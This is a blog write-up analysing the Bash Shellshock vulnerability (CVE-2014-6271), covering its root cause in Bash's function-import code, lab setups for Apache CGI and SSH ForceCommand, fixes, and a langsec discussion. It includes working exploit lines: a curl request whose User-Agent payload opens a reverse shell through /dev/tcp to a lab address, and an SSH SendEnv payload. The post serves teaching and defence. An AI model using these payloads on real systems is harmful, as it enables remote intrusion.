CVE-2014-6271 - Shellshock

This is the first post in my CVE Analysis blog series. Since this is the first post in this series and I have no prior experience with CVE analysis, I will be writing about Shellshock. This is an old vulnerability in Bash, and there are already many articles and blogs written about it. Therefore, this is not something you would want to read if you are already familiar with this vulnerability, as no novel techniques or previously unknown facts are discussed here. Rather, this is just my attempt to establish a format for writing future posts. And after weeks ~~months~~ of procrastination, I finally finished it. With that disclaimer in place, let’s get started.

Summary

CVE	CVE-2014-6271
Disclosure Date	12 September 2014
Patch Date	24 September 2014
Product	Bash
Advisory	https://nvd.nist.gov/vuln/detail/CVE-2014-6271
Affected Versions	1.03 - 4.3
First Patched Version	4.3-025
Issue/Bug Report	https://seclists.org/oss-sec/2014/q3/650
Reporter(s)	Stéphane Chazelas

GNU Bash versions 1.03 through 4.3 process trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.”

Exploitation

A quick Google search on how to test if your Bash version is vulnerable to Shellshock will show you a proof of concept like this:

env x='() { :;}; echo vulnerable' bash -c 'echo test'

Let’s check one by one what this command means.

Environment Variables

First we have to understand what an environment variable is. An environment variable is a dynamic, named value maintained by the operating system; it is not a feature specific to any shell or to Linux itself. It can be used by other processes to obtain various configurations. For example, in Linux the $HOME environment variable is used to store the location of the home directory of the current user. Bash is simply another process that can read or modify its own environment variables. In Bash we can set our own custom environment variable using the built-in export command:

export foo='hello world'

Now any child processes spawned by the current Bash instance can access the environment variable named foo. This variable can be referenced by adding a $ at the start of the variable name:

echo $foo
# hello world
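
To make the difference between a plain shell variable and an exported one visible, here is a minimal sketch. The names local_only, shared, and child_view are made up for this illustration; the child process is started with sh -c and reports which of the two variables it can see.

```shell
# Start from a clean slate so earlier experiments do not interfere.
unset local_only shared

local_only='only in this shell'      # plain shell variable, not exported
export shared='visible to children'  # exported, so it is copied to children

child_view() {
  # sh -c runs a child process; ${var-unset} expands to "unset" when the
  # variable is missing from the child's environment.
  sh -c 'printf "%s|%s\n" "${local_only-unset}" "${shared-unset}"'
}

child_view
# unset|visible to children
```

Only the exported variable makes it into the child, which is exactly the channel Shellshock abuses later on.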

We can also set an environment variable for a single program without exporting it:

foo='hello world' program

This will spawn the child process program with the environment variable foo in it. Now you may notice that in the above Shellshock payload they are using the env command to set the environment variable. The env command is a standalone utility designed to manage the environment with more control when launching a process:

# To start the program with an empty environment (no inherited variables)
env -i program  
# To start the program with the FOO environment variable
env FOO='test' program
# To remove the FOO variable from the environment before running program
env -u FOO program

Functions as Environment Variables

So far, we have learned about how to export normal static values as environment variables. In Bash, we can also export shell functions into the environment—a Bash extension that isn’t part of the POSIX standard. These exported functions are only passed to child Bash processes; other programs or non-Bash shells will ignore them. There are several ways to define these variables, including using the export command with the -f flag to say that the given name refers to a Bash function.

hello() { echo "Hello, World"; }
export -f hello
bash -c 'hello' # This will start a new child Bash process and call the exported hello function
# Hello, World

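Using the env command (this form and the next one only work on an unpatched Bash, which treats any variable whose value starts with () { as a function):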

env hello='() { echo "Hello, World"; }' bash -c 'hello'
# Hello, World

Or we can simply follow the same FOO='value' program format, without any additional utility program, which will also work:

hello='() { echo "Hello, World"; }' bash -c hello
# Hello, World

The payload

Now that we have covered the essentials, let’s walk through the payload step by step:

env x='() { :;}; echo vulnerable' bash -c 'echo test'

In this command, we define a shell function in the environment variable x and pass it to a new Bash process. Here, : (colon) is a Bash built-in command that does nothing, so x is just an empty function. The crucial point—and the heart of the Shellshock vulnerability—is what comes after the function definition. We don’t stop at the end of the function (}); we append a trailing ; echo vulnerable to it. A vulnerable Bash program, when parsing its environment variables, doesn’t stop at the function’s closing brace—it continues past the semicolon and executes echo vulnerable as a separate command. The important thing is we don’t have to call the function x to invoke this; the extra command runs automatically during parsing.

In a vulnerable Bash version this command will print both “vulnerable” and “test”.
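
The same check can be wrapped in a small helper. This is only a sketch: check_shellshock is a name I made up, it takes an optional path to the Bash binary to test, and it only covers the original CVE-2014-6271 payload, not the related parser bugs found afterwards.

```shell
check_shellshock() {
  # $1: Bash binary to test (defaults to whatever "bash" is on PATH)
  bash_bin=${1:-bash}

  # Run the proof of concept and capture everything the child prints.
  out=$(env x='() { :;}; echo vulnerable' "$bash_bin" -c 'echo test' 2>/dev/null)

  # A vulnerable Bash prints "vulnerable" before "test"; a patched one
  # treats x as ordinary data and prints only "test".
  case $out in
    *vulnerable*) echo "vulnerable" ;;
    *)            echo "not vulnerable" ;;
  esac
}

check_shellshock
```

Note that the helper also reports "not vulnerable" when the given binary cannot be started at all, so it is a quick check rather than a proof.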

Root Cause Analysis

Now let’s take a look at the Bash source code to see where the vulnerability exists. We will look specifically at the code that is responsible for parsing environment variables. The main function inside the shell.c file calls shell_initialize():

static void shell_initialize () {
[...]

  /* Initialize internal and environment variables.  Don't import shell
     functions from the environment if we are running in privileged or
     restricted mode or if the shell is running setuid. */

#if defined (RESTRICTED_SHELL)
  initialize_shell_variables (shell_environment, privileged_mode||restricted||running_setuid);
#else
  initialize_shell_variables (shell_environment, privileged_mode||running_setuid);
#endif

[...]
}

The shell_environment variable holds the environment, and it is passed to another function called initialize_shell_variables(env, privmode). The privmode argument is nonzero when Bash runs in privileged mode (for example, when started with the -p flag) or setuid, and in restricted mode when that feature is compiled in. This will come up again when we discuss the different ways that were used to fix Shellshock. The function is defined in the variables.c file:

/* Initialize the shell variables from the current environment.
   If PRIVMODE is nonzero, don't import functions from ENV or
   parse $SHELLOPTS. */
void initialize_shell_variables (env, privmode)
     char **env;
     int privmode;
{
[...]

for (string_index = 0; string = env[string_index++]; )
    {
    [...]
    /* If exported function, define it now.  Don't import functions from
	 the environment in privileged mode. */
    if (privmode == 0 && read_but_dont_execute == 0 && 
	    STREQN ("() {", string, 4)) {
		[...]
		// This is where shellshock happens
		parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST);
		[...]
	}

After some string manipulation the environment variables are passed to the parse_and_execute() function. For example, if the environment variable contains a value like:

FOO=() { echo hi; }

Then it is converted to FOO () { echo hi; }, stored in temp_string, and passed to the parse_and_execute() function for execution. The only check that distinguishes an exported function from an ordinary exported variable is whether its value starts with () {.
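
The string manipulation can be imitated in a few lines of shell. This is a rough sketch of the idea, not the actual C code: to_definition is a hypothetical helper that takes one NAME=VALUE entry and, if the value starts with () {, prints the text that would be handed to the parser.

```shell
to_definition() {
  entry=$1
  name=${entry%%=*}    # everything before the first "="
  value=${entry#*=}    # everything after the first "="

  case $value in
    '() {'*) printf '%s %s\n' "$name" "$value" ;;  # looks like a function
    *)       return 1 ;;                           # ordinary variable
  esac
}

to_definition 'FOO=() { echo hi; }'
# FOO () { echo hi; }

to_definition 'x=() { :;}; echo vulnerable'
# x () { :;}; echo vulnerable
```

The second call shows the problem: the trailing command is still part of the string that gets parsed and executed.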

int parse_and_execute (string, from_file, flags)
     char *string;
     const char *from_file;
     int flags;
{
  [...]
  with_input_from_string (string, from_file);

  while (*(bash_input.location.string))
    {
      [...]
      if (parse_command () == 0)
        {
          [...]
          last_result = execute_command_internal
                (command, 0, NO_PIPE, NO_PIPE, bitmap);
          dispose_command (command);
          [...]
        }
      else
        {
          last_result = EXECUTION_FAILURE;
          break;
        }
    }

  [...]
  return (last_result);
}

Bash imports the function by simply executing its definition. You can reproduce this by entering the string FOO () { echo hi; } into a Bash shell and then calling FOO.

This is similar to how Bash adds the function to its function table. The above string containing the function definition is treated as an input to the parser, and if it parses successfully, it is executed using the execute_command_internal() function without any further checks or sanitization. parse_command() doesn’t stop after the function definition. If the string contains trailing commands after the function definition, it will happily parse the entire input, and all of it will be executed.
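
The behavior is easy to reproduce in any shell. In the sketch below, eval stands in for parse_and_execute() (that substitution is my own simplification), and import_definition is a made-up name for the import step.

```shell
# eval parses and runs the whole string, just like the vulnerable import did.
import_definition() {
  eval "$1"
}

# A clean definition only registers the function; nothing runs until we call it.
import_definition 'FOO () { echo hi; }'
FOO
# hi

# With a trailing command, that command runs during the "import" itself,
# even though the function x is never called.
import_definition 'x () { :;}; echo vulnerable'
# vulnerable
```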

Attack Vectors

Now you might wonder how this specific parsing vulnerability in Bash could lead to widespread exploitation—and in most cases that would seem like a reasonable question. But the problem arises when other applications use Bash under the hood to deal with user inputs. We will talk about various such applications shortly.

For a system to be vulnerable to Shellshock, 3 conditions must be met:

The application must set an environment variable with attacker-controlled values.
It must invoke the Bash shell.
And most importantly, the system must be running on a vulnerable version of Bash.

Shortly after the Shellshock vulnerability was found, people started to find more and more applications that came under these exploitable conditions.

Common Gateway Interface (CGI)

The major attack vector for this vulnerability was CGI-based web servers, which were popular and widely used at the time. CGI is an interface specification that defines how a web server hands HTTP requests to external programs, which can range from compiled C binaries to Bash scripts. According to the specification, information from the server is carried to the program in something called meta-variables. The most common implementation of these is the system’s environment variables. That is, information like HTTP headers, the HTTP method, and other user input such as request parameters is passed to the program as environment variables. The server then starts a new child process of the program with this crafted environment. If the program invokes Bash (directly or indirectly), Bash will import and parse all environment variables, which in vulnerable versions can lead to command execution.

Web servers like Apache, Microsoft IIS, etc. have support for CGI scripting. We will take a look at Apache in this post by setting up a Docker container with a vulnerable Bash version. You can check out the lab in my GitHub repo. To enable CGI in Apache, first we need to load the necessary module in the httpd.conf file:

LoadModule cgid_module modules/mod_cgid.so

We also need to specify that a particular directory is set aside for CGI programs. Apache will assume that every file in this directory is a CGI program and will try to execute it when that particular program is requested by a client. We can use the ScriptAlias directive in Apache to specify this.

ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/"

With this, whenever the client sends a request like https://test.com/cgi-bin/program.sh, the server will check if the program.sh is present inside the /usr/local/apache2/cgi-bin/ directory, and if it is present, will try to execute it. To permit execution of the programs inside cgi-bin/, we need to explicitly specify that using the Options +ExecCGI directive:

<Directory "/usr/local/apache2/cgi-bin">
    AllowOverride None
    # Enable CGI execution
    Options +ExecCGI
    
    Require all granted
    <IfModule mime_module>
        ForceType application/x-httpd-cgi
    </IfModule>
</Directory>

We also need to tell the server which files are CGI files. For that we will use the AddHandler directive:

AddHandler cgi-script .sh

For testing purposes, we’ll create a ping.sh script that accepts an IP address from the client, runs ping on it, and returns the output.

#!/usr/bin/bash

IP=$(printf "%s" "$QUERY_STRING" | sed -n 's/^ip=\([^&]*\).*/\1/p')
PING_OUT=$(ping -c 2 -- "$IP")

printf "Content-type: text/html\n\n"
printf "%s" "$PING_OUT"
printf "\n\n"
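
To see what the sed expression in the script extracts, it can be tried outside the web server. extract_ip is a hypothetical wrapper around the same expression, and the query strings are made-up examples.

```shell
extract_ip() {
  # Same expression as in ping.sh: capture everything between a leading
  # "ip=" and the next "&" (or the end of the string).
  printf '%s' "$1" | sed -n 's/^ip=\([^&]*\).*/\1/p'
}

extract_ip 'ip=8.8.8.8&count=2'
# 8.8.8.8

# The pattern is anchored, so ip must be the first parameter; this prints nothing.
extract_ip 'count=2&ip=8.8.8.8'
```

The value is not URL-decoded, which is fine for a lab script but worth keeping in mind.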

With this, now we can set up a Docker container for testing. After running Docker, send a request with the Shellshock payload inside the User-Agent.

curl -ik 'http://localhost:8080/cgi-bin/ping.sh?ip=google.com' \
	 -H 'User-Agent: () { :; };/usr/bin/bash -i >& /dev/tcp/172.17.0.1/1234 0>&1'

This works because Apache copies the value of the User-Agent header into the HTTP_USER_AGENT environment variable. When the server spawns the CGI script, the new Bash process imports that environment, and our payload is executed as well.
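
The naming rule comes from the CGI specification (RFC 3875): the header name is upper-cased, every "-" becomes "_", and HTTP_ is prepended. A small sketch of that mapping, with cgi_var_name being a name I made up:

```shell
cgi_var_name() {
  # $1: HTTP header name, e.g. User-Agent
  printf 'HTTP_%s\n' "$(printf '%s' "$1" | tr '[:lower:]' '[:upper:]' | tr '-' '_')"
}

cgi_var_name 'User-Agent'
# HTTP_USER_AGENT

cgi_var_name 'Accept-Language'
# HTTP_ACCEPT_LANGUAGE
```

Every request header is therefore a possible carrier for the payload, not just User-Agent.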

Secure Shell (SSH)

SSH is a service that can be used to securely access a shell on a remote host. We can use it to log in to a different host and execute commands in that system. You might ask: if SSH itself provides shell access, then what is the purpose of using Shellshock to get a shell? This is a valid question in most cases where SSH is configured to allow full shell access. However, there are instances where the server is configured to restrict users from accessing a normal shell. Instead, it provides a restricted shell, where only specific commands or scripts are allowed to execute as a particular user. The ForceCommand directive in the sshd_config file is used for this purpose. Most commonly this feature is used to run automated tasks when a specific user logs into the machine.

Match user backup_user
	ForceCommand /usr/local/bin/backup.sh
	PermitTTY no

This block executes the backup.sh script whenever backup_user logs in through SSH, regardless of the command the client asked for. backup_user is only there to do the backup, and the PermitTTY no directive additionally prevents the session from allocating a terminal.

There’s also a feature in SSH that allows users to pass environment variables to the system. This also needs some additional configuration in the sshd_config file of the server:

PermitUserEnvironment yes
AcceptEnv USER_ENV

PermitUserEnvironment makes sshd process the user’s ~/.ssh/environment file and the environment= options in ~/.ssh/authorized_keys, while AcceptEnv lists the variables a client is allowed to send, here USER_ENV. By default PermitUserEnvironment is set to no since it can be used to bypass access restrictions in some configurations even without a Shellshock vulnerability. For example, by setting environment variables like LD_PRELOAD, LD_LIBRARY_PATH, etc., a user can load malicious shared libraries and override library functions. AcceptEnv is the safer of the two, since only whitelisted environment variables are copied into the session.

Now imagine an SSH server that is set up to run a shell script every time a user logs in using the ForceCommand directive, where either PermitUserEnvironment or AcceptEnv is set. If the server is using a vulnerable Bash version and we know the password of the user, then we can craft an environment variable and send it to the server using -o SendEnv=VAR, which will trigger Shellshock and bypass the restriction to get full shell access.

I have created a Docker lab setup to test this, which you can access here in my GitHub. For this lab I created a simple bash script that will just print a welcome message and exit.

#!/usr/bin/env bash

echo "Welcome to my SSH Server"
echo "========================"
echo
echo "Maintenance: "
echo "Unfortunately the server is under maintenance, come back later"
exit

I then added these configurations in the /etc/ssh/sshd_config file:

# Enable root login
PermitRootLogin yes

# Disable TTY access
PermitTTY no

# Allow environment variable
AcceptEnv LANG LC_*

# Command to execute on login.
# There's no Match directive specified, so by default all 
# users will execute this script on login.
ForceCommand /sbin/welcome_script.sh
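
From the client side, triggering the bug against this configuration could look roughly like the sketch below. The host, the port, and the variable name LC_PAYLOAD are my assumptions (any name matching the LC_* pattern from AcceptEnv should be accepted), and it only works if the forced command ends up being run by a vulnerable Bash.

```shell
# Hypothetical lab endpoint; adjust to wherever the container's sshd is published.
LAB_HOST=${LAB_HOST:-localhost}
LAB_PORT=${LAB_PORT:-2222}

send_payload() {
  # LC_PAYLOAD matches "AcceptEnv LANG LC_*", so sshd copies it into the
  # environment of the forced command. A vulnerable Bash would run the
  # trailing echo before the welcome script starts.
  LC_PAYLOAD='() { :;}; echo shellshock-marker' \
    ssh -o SendEnv=LC_PAYLOAD -p "$LAB_PORT" "root@$LAB_HOST"
}
```

Calling send_payload against the lab should print shellshock-marker ahead of the welcome message if the server is vulnerable; replacing the echo with another command is what turns this into a restriction bypass.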

There are more attack vectors, which we won’t explore in this post (maybe in the future). I will list some of them here, if you want to explore them yourself:

DHCP
Mail services
OpenVPN

Mitigation

The initial patch introduced by the maintainer of Bash didn’t fix the core issue entirely, and people started to find various other related but different parsing bugs. After Shellshock, with the new knowledge that merely having the shell parse arbitrary environment variables is exploitable, people realized that the Bash parser was an attack surface. With this realization people began trying standard techniques like fuzzing to quickly find new vulnerabilities in the parser.

One quick workaround for Shellshock was to disable function import entirely. This was done by adding the -p flag, which makes the process run in privileged mode.

-p  Turn on privileged mode. In this mode, the $ENV and $BASH_ENV files
  are not processed, shell functions are not inherited from the
  environment, and the SHELLOPTS, BASHOPTS, CDPATH, and GLOBIGNORE
  variables, if they appear in the environment, are ignored.  If the
  shell is started with the effective user (group) id not equal to the
  real user (group) id, and the -p option is not supplied, these
  actions are taken and the effective user id is set to the real user
  id.  If the -p option is supplied at startup, the effective user id
  is not reset.  Turning this option off causes the effective user and
  group ids to be set to the real user and group ids.

If you remember from the Root Cause Analysis section, shell functions are only parsed if the privmode variable is set to 0. So this is a valid fix to Shellshock. But more often than not, developers needed this feature, and temporarily disabling function export doesn’t fix the underlying vulnerability.
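
The effect of -p on function import can be observed on any Bash. In this sketch greet_fn is a made-up function name, and the outer bash -c only exists to define and export it before starting the child shell.

```shell
# Child started normally: the exported function is imported and can be called.
without_privileged_mode() {
  bash -c 'greet_fn() { echo hi; }; export -f greet_fn; bash -c greet_fn'
}

# Child started with -p: functions are not inherited, so the call fails.
with_privileged_mode() {
  bash -c 'greet_fn() { echo hi; }; export -f greet_fn; bash -p -c greet_fn' 2>/dev/null \
    || echo "greet_fn was not imported"
}

without_privileged_mode
# hi
with_privileged_mode
# greet_fn was not imported
```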

On September 25, Florian Weimer, a researcher from Red Hat, posted an unofficial patch addressing Shellshock and its variants. His patch offered a general solution: Bash only parses a variable as a function if its name starts with the prefix BASH_FUNC_ and ends with the suffix (). Soon people realized that separating shell functions into their own special namespace would fix the underlying issue, and most implementations adopted this prefix + suffix fix (upstream Bash uses %% as the suffix).
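
On a patched system both halves of this fix can be observed directly. The sketch below assumes the local bash is a patched build; exported_entry and plain_value are names I made up. The exact encoding of the function name differs between vendors, so no expected output is given for the first call.

```shell
# Ask the local Bash how it encodes an exported function in the environment.
exported_entry() {
  bash -c 'hello() { echo "Hello, World"; }; export -f hello; env' | grep 'hello'
}

# An ordinary variable whose value merely looks like a function stays data.
plain_value() {
  env x='() { :;}; echo vulnerable' bash -c 'printf "%s\n" "$x"'
}

exported_entry
plain_value
# () { :;}; echo vulnerable
```

The first call shows the dedicated namespace for functions, and the second shows that the old payload is no longer parsed as code.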

Beyond Shellshock

In the wild exploits

Considering the simplicity of the vulnerability, it is surprising that this bug remained hidden for about 25 years, dating back to version 1.03, released in September 1989. A direct follow-up question is whether anyone else knew about this vulnerability and whether it was being exploited prior to its public disclosure. Unlike other mass-exploited vulnerabilities such as the infamous Heartbleed, which leaves no trace, Shellshock attempts can be clearly logged and easily detected. However, we haven’t come across any official evidence or public reports of such use. Still, we cannot entirely rule out in-the-wild exploitation: since Shellshock gives attackers command execution on the system, they would likely take measures to avoid detection and clear the logs. But it is highly unlikely that attackers would make no mistakes at all and leave behind no trace of evidence.
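
As a rough illustration of why such attempts stand out in logs, here is a sketch that filters log lines containing the function-definition prefix. find_shellshock_probes is a made-up helper and the two log lines are invented samples, not real traffic.

```shell
# Print lines that contain "()" followed by optional whitespace and "{".
find_shellshock_probes() {
  grep -E '\(\)[[:space:]]*\{' "$@"
}

# Two made-up access-log lines: one normal request and one probe.
printf '%s\n' \
  '10.0.0.5 "GET /cgi-bin/ping.sh?ip=1.1.1.1" "curl/7.88"' \
  '10.0.0.9 "GET /cgi-bin/ping.sh" "() { :; }; /bin/id"' \
  | find_shellshock_probes
# 10.0.0.9 "GET /cgi-bin/ping.sh" "() { :; }; /bin/id"
```

The helper also accepts file names as arguments, so it can be pointed at an existing access log.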

Even if you argue that nation-state threat actors wouldn’t leave any traces behind, they have not always had such advanced OPSEC techniques. Even today nation-states make mistakes and leave traces behind in various attacks. Therefore, it is extremely doubtful that they had such techniques before 2014. As for how the vulnerability was found, Stéphane Chazelas himself stated that he did not find it by reading the Bash source code. No one in their right mind would think of auditing the Bash source code; as Michal Zalewski put it, it wouldn’t be much better than auditing /bin/uname. Even if you knew that Bash parses arbitrary environment variables incorrectly, it would take a much greater leap to realize that this incorrect parsing poses a significant security risk.

In the end, Shellshock was caused by Bash’s ambiguous design and parser implementation choices, as well as its failure to maintain proper separation of code and data. Bash alone cannot be blamed for this; third parties using it for configuration made this subtle parser quirk even more severe. Which brings us to LangSec.

Language theoretic security and mismorphisms

But if you can prove that the input for program A constructs a turing complete grammar you have already lost. You cannot “fix” these bugs, as there is an infinite number of them. You need to fix the parsers and the languages first.

I think this is the right time to mention langsec research. As this paper states, “Mismorphisms—instances where predicates take on different truth values across different interpretations of reality (notably, different actors’ perceptions of reality and the actual reality)—are the source of weird instructions.”

The syntax used to export static variables can also be applied to export shell functions, which the interpreter then parses and executes. This broke the assumption that values in these contexts would be treated purely as data, creating a false sense of security. Third parties like Apache CGI, SSH, etc. began using environment variables for managing configuration, which now contains untrusted user input, creating a weird machine. Adding to this is the fact that the parser is broken, allowing a user to append arbitrary commands after the function definition, which the parser then executes.

Seen through the langsec lens, much more can be learned about secure software development. Shellshock is a great example of how layering convenient features across components (e.g., Apache -> CGI -> Bash) builds accidental weird machines.

That’s it for today. While researching this one, I found many informative discussions, articles, and research papers. All of them are listed below.

Go through them if you want to learn about the various perspectives and opinions of people on this incident. I especially recommend reading this particular essay, which goes far beyond Shellshock and provides general information as well as various measures to prevent such vulnerabilities in the future.